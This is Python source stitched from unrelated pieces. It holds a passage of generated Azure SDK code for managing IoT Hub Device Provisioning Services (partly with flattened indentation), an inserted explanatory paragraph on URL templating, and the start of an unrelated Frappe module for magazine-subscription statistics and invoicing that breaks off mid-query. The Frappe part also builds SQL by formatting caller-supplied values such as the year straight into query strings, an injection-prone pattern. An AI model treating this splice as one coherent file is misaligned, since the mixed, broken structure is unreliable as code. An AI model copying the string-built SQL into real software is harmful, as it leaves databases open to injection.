# Construct body
body_content = self._serialize.body(iot_dps_description, 'ProvisioningServiceDescription')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if response.status_code == 201:
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, provisioning_service_name, iot_dps_description, custom_headers=None, raw=False, **operation_config):
"""Create or update the metadata of the provisioning service.
Create or update the metadata of the provisioning service. The usual
pattern to modify a property is to retrieve the provisioning service
metadata and security metadata, and then combine them with the modified
values in a new body to update the provisioning service.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service to
create or update.
:type provisioning_service_name: str
:param iot_dps_description: Description of the provisioning service to
create or update.
:type iot_dps_description:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns
ProvisioningServiceDescription or ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
iot_dps_description=iot_dps_description,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 201]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def _update_initial(
self, resource_group_name, provisioning_service_name, tags=None, custom_headers=None, raw=False, **operation_config):
provisioning_service_tags = models.TagsResource(tags=tags)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(provisioning_service_tags, 'TagsResource')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, resource_group_name, provisioning_service_name, tags=None, custom_headers=None, raw=False, **operation_config):
"""Update an existing provisioning service's tags.
Update an existing provisioning service's tags. To update other fields,
use the CreateOrUpdate method.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service to
create or update.
:type provisioning_service_name: str
:param tags: Resource tags
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns
ProvisioningServiceDescription or ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_initial(
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def _delete_initial(
self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'
path_format_arguments = {
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204, 404]:
raise models.ErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Delete the Provisioning Service.
Deletes the Provisioning Service.
:param provisioning_service_name: Name of provisioning service to
delete.
:type provisioning_service_name: str
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns None or
ClientRawResponse if raw=true
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
raw_result = self._delete_initial(
provisioning_service_name=provisioning_service_name,
resource_group_name=resource_group_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202, 204, 404]:
raise models.ErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def list_by_subscription(
self, custom_headers=None, raw=False, **operation_config):
"""Get all the provisioning services in a subscription.
List all the provisioning services for a given subscription id.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of ProvisioningServiceDescription
:rtype:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescriptionPaged[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Devices/provisioningServices'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ProvisioningServiceDescriptionPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ProvisioningServiceDescriptionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Get a list of all provisioning services in the given resource group.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of ProvisioningServiceDescription
:rtype:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescriptionPaged[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ProvisioningServiceDescriptionPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ProvisioningServiceDescriptionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def get_operation_result(
self, operation_id, resource_group_name, provisioning_service_name, asyncinfo="true", custom_headers=None, raw=False, **operation_config):
"""Gets the status of a long running operation, such as create, update or
delete a provisioning service.
:param operation_id: Operation id corresponding to long running
operation. Use this to poll for the status.
:type operation_id: str
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service that
the operation is running on.
:type provisioning_service_name: str
:param asyncinfo: Async header used to poll on the status of the
operation, obtained while creating the long running operation.
:type asyncinfo: str
:param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: AsyncOperationResult or ClientRawResponse if raw=true
        :rtype:
         ~azure.mgmt.iothubprovisioningservices.models.AsyncOperationResult or
         ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/operationresults/{operationId}'
        path_format_arguments = {
            'operationId': self._serialize.url("operation_id", operation_id, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['asyncinfo'] = self._serialize.query("asyncinfo", asyncinfo, 'str')
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)

        if response.status_code not in [200]:
            raise models.ErrorDetailsException(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('AsyncOperationResult', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def list_valid_skus(
            self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
        """Get the list of valid SKUs for a provisioning service.

        Gets the list of valid SKUs and tiers for a provisioning service.

        :param provisioning_service_name: Name of provisioning service.
        :type provisioning_service_name: str
        :param resource_group_name: Name of resource group.
        :type resource_group_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of IotDpsSkuDefinition
        :rtype:
         ~azure.mgmt.iothubprovisioningservices.models.IotDpsSkuDefinitionPaged[~azure.mgmt.iothubprovisioningservices.models.IotDpsSkuDefinition]
        :raises:
         :class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
        """
        def internal_paging(next_link=None, raw=False):

            if not next_link:
                # Construct URL
                url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/skus'
                path_format_arguments = {
                    'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)

            if response.status_code not in [200]:
                raise models.ErrorDetailsException(self._deserialize, response)

            return response

        # Deserialize response
        deserialized = models.IotDpsSkuDefinitionPaged(internal_paging, self._deserialize.dependencies)

        if raw:
            header_dict = {}
            client_raw_response = models.IotDpsSkuDefinitionPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response

        return deserialized

    def check_provisioning_service_name_availability(
            self, name, custom_headers=None, raw=False, **operation_config):
        """Check if a provisioning service name is available.

        Check if a provisioning service name is available. This will validate
        if the name is syntactically valid and if the name is usable.

        :param name: The name of the Provisioning Service to check.
        :type name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: NameAvailabilityInfo or ClientRawResponse if raw=true
        :rtype:
         ~azure.mgmt.iothubprovisioningservices.models.NameAvailabilityInfo or
         ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
        """
        arguments = models.OperationInputs(name=name)

        # Construct URL
        url = '/subscriptions/{subscriptionId}/providers/Microsoft.Devices/checkProvisioningServiceNameAvailability'
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(arguments, 'OperationInputs')

        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, stream=False, **operation_config)

        if response.status_code not in [200]:
            raise models.ErrorDetailsException(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('NameAvailabilityInfo', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def list_keys(
            self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
        """Get the security metadata for a provisioning service.

        List the primary and secondary keys for a provisioning service.

        :param provisioning_service_name: The provisioning service name to get
         the shared access keys for.
        :type provisioning_service_name: str
        :param resource_group_name: resource group name
        :type resource_group_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of
         SharedAccessSignatureAuthorizationRuleAccessRightsDescription
        :rtype:
         ~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleAccessRightsDescriptionPaged[~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription]
        :raises:
         :class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
        """
        def internal_paging(next_link=None, raw=False):

            if not next_link:
                # Construct URL
                url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/listkeys'
                path_format_arguments = {
                    'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.post(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)

            if response.status_code not in [200]:
                raise models.ErrorDetailsException(self._deserialize, response)

            return response

        # Deserialize response
        deserialized = models.SharedAccessSignatureAuthorizationRuleAccessRightsDescriptionPaged(internal_paging, self._deserialize.dependencies)

        if raw:
            header_dict = {}
            client_raw_response = models.SharedAccessSignatureAuthorizationRuleAccessRightsDescriptionPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response

        return deserialized

    def list_keys_for_key_name(
            self, provisioning_service_name, key_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
        """Get a shared access policy by name from a provisioning service.

        List primary and secondary keys for a specific key name.

        :param provisioning_service_name: Name of the provisioning service.
        :type provisioning_service_name: str
        :param key_name: Logical key name to get key-values for.
        :type key_name: str
        :param resource_group_name: The name of the resource group that
         contains the provisioning service.
        :type resource_group_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: SharedAccessSignatureAuthorizationRuleAccessRightsDescription
         or ClientRawResponse if raw=true
        :rtype:
         ~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription
         or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/keys/{keyName}/listkeys'
        path_format_arguments = {
            'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
            'keyName': self._serialize.url("key_name", key_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)

        if response.status_code not in [200]:
            raise models.ErrorDetailsException(self._deserialize, response)

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('SharedAccessSignatureAuthorizationRuleAccessRightsDescription', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
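Each operation above builds its request URL by substituting serialized path arguments into a placeholder template via `format_url`. Stripped of the msrest serializer, the substitution step is plain `str.format` over the template. The sketch below is a stand-alone illustration with made-up argument values, not the SDK's actual implementation:

```python
# Minimal sketch of the URL templating used by the generated operations.
# The real client delegates to msrest's format_url; this version only
# demonstrates the placeholder substitution with illustrative values.
url_template = (
    '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}'
    '/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'
    '/keys/{keyName}/listkeys'
)

path_format_arguments = {
    'subscriptionId': 'sub-123',
    'resourceGroupName': 'my-rg',
    'provisioningServiceName': 'my-dps',
    'keyName': 'provisioningserviceowner',
}

url = url_template.format(**path_format_arguments)
print(url)
```

In the generated code each value additionally passes through `self._serialize.url(...)`, which validates and URL-encodes it before substitution.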
# -*- coding: utf-8 -*-
# Copyright (c) 2021, libracore AG and contributors
# For license information, please see license.txt

from __future__ import unicode_literals

import math

import frappe, os
from frappe import _
from frappe import publish_progress
from frappe.utils.background_jobs import enqueue
from frappe.utils.data import today, now
from PyPDF2 import PdfFileWriter

from mietrechtspraxis.mietrechtspraxis.utils.qrr_reference import get_qrr_reference


@frappe.whitelist()
def get_show_data(sel_type):
    anz_abos = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `status` = 'Active' OR `status` = 'Actively terminated'""", as_dict=True)[0].qty
    anz_jahres_abos = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `type` = 'Jahres-Abo' AND `status` = 'Active'""", as_dict=True)[0].qty
    anz_jahres_abos_gekuendet = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `type` = 'Jahres-Abo' AND `status` = 'Actively terminated'""", as_dict=True)[0].qty
    anz_aktive_probe_abos = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `type` = 'Probe-Abo' AND `end_date` >= '{today}'""".format(today=today()), as_dict=True)[0].qty
    anz_gratis_abos = frappe.db.sql("""SELECT COUNT(`name`) AS `qty` FROM `tabmp Abo` WHERE `type` = 'Gratis-Abo' AND `status` = 'Active'""", as_dict=True)[0].qty
    return {
        'anz_abos': anz_abos,
        'anz_jahres_abos': anz_jahres_abos,
        'anz_jahres_abos_gekuendet': anz_jahres_abos_gekuendet,
        'anz_aktive_probe_abos': anz_aktive_probe_abos,
        'anz_gratis_abos': anz_gratis_abos
    }


@frappe.whitelist()
def create_invoices(date, year, selected_type, limit=False):
    args = {
        'date': date,
        'year': year,
        'selected_type': selected_type
    }
    enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print._create_invoices", queue='long', job_name='Generierung Sammel-PDF (Rechnungslauf)', timeout=5000, **args)


def _create_invoices(date, year, selected_type, limit=500):
    # compute the number of batches based on the limit
    filter_keine_doppel_rechnung = """SELECT `parent` FROM `tabmp Abo Invoice` WHERE `year` = '{year}'""".format(year=year)
    if selected_type == 'invoice_inkl':
        filter_invoice_typ = """`magazines_qty_ir` > 0"""
    else:
        filter_invoice_typ = """`magazines_qty_ir` = 0"""
    filter_ausland_adressen = """ AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')"""
    filter_inland_adressen = """ AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')"""
    ausland_abos_qty = frappe.db.sql("""SELECT
                                            COUNT(`name`) AS `qty`
                                        FROM `tabmp Abo`
                                        WHERE `type` = 'Jahres-Abo'
                                        AND `status` = 'Active'
                                        AND {filter_invoice_typ}
                                        AND `name` NOT IN ({filter_keine_doppel_rechnung})
                                        {filter_ausland_adressen} ORDER BY `magazines_qty_ir` ASC""".format(filter_invoice_typ=filter_invoice_typ,
                                                                                                            filter_keine_doppel_rechnung=filter_keine_doppel_rechnung,
                                                                                                            filter_ausland_adressen=filter_ausland_adressen), as_dict=True)[0].qty
    inland_abos_qty = frappe.db.sql("""SELECT
                                            COUNT(`name`) AS `qty`
                                        FROM `tabmp Abo`
                                        WHERE `type` = 'Jahres-Abo'
                                        AND `status` = 'Active'
                                        AND {filter_invoice_typ}
                                        AND `name` NOT IN ({filter_keine_doppel_rechnung})
                                        {filter_inland_adressen} ORDER BY `magazines_qty_ir` ASC""".format(filter_invoice_typ=filter_invoice_typ,
                                                                                                           filter_keine_doppel_rechnung=filter_keine_doppel_rechnung,
                                                                                                           filter_inland_adressen=filter_inland_adressen), as_dict=True)[0].qty
    total_qty = ausland_abos_qty + inland_abos_qty
    batch_anz = math.ceil(total_qty / limit)

    # batch processing
    for batch in range(batch_anz):
        # reset the duplicate-invoice filter
        filter_keine_doppel_rechnung = """SELECT `parent` FROM `tabmp Abo Invoice` WHERE `year` = '{year}'""".format(year=year)
        qty_one = 0
        qty_multi = 0
        abos = []
        if limit:
            limit_filter = ' LIMIT {limit}'.format(limit=limit)
        else:
            limit_filter = ''
        ausland_abos = frappe.db.sql("""SELECT
                                            `name`
                                        FROM `tabmp Abo`
                                        WHERE `type` = 'Jahres-Abo'
                                        AND `status` = 'Active'
                                        AND {filter_invoice_typ}
                                        AND `name` NOT IN ({filter_keine_doppel_rechnung}){filter_ausland_adressen} ORDER BY `magazines_qty_ir` ASC{limit_filter}""".format(filter_invoice_typ=filter_invoice_typ, filter_keine_doppel_rechnung=filter_keine_doppel_rechnung, filter_ausland_adressen=filter_ausland_adressen, limit_filter=limit_filter), as_dict=True)
        for ausland_abo in ausland_abos:
            abos.append(ausland_abo)
        inland_abos = frappe.db.sql("""SELECT
                                            `name`
                                        FROM `tabmp Abo`
                                        WHERE `type` = 'Jahres-Abo'
                                        AND `status` = 'Active'
